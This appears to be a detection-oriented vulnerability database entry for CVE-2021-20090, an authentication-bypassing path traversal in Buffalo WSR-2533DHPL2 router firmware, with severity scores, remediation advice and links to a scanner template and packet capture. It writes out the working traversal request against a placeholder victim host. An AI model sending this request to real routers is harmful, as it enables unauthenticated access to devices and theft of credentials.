🔙 목록으로 돌아가기

CVE-2021-20090: Buffalo WSR-2533DHPL2 - Path Traversal

TitleBuffalo WSR-2533DHPL2 - Path Traversal
Authorgy741
SeverityCritical
ImpactAn attacker can exploit this vulnerability to read sensitive files, such as configuration files, credentials, or other sensitive information.
RemediationApply the latest firmware update provided by Buffalo to fix the path traversal vulnerability.
CVSS Score9.8
EPSS Score0.94401
CVE IDCVE-2021-20090
CWE IDCWE-22
Tags cve cve2021 lfi buffalo firmware iot kev tenable vkev vuln

🔍 Vulnerability Description

Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.

🌐 HTTP Request

GET /images/..%2finfo.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.17
Connection: close
Referer: http://www.victim.com/info.html
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-20090.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-20090.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A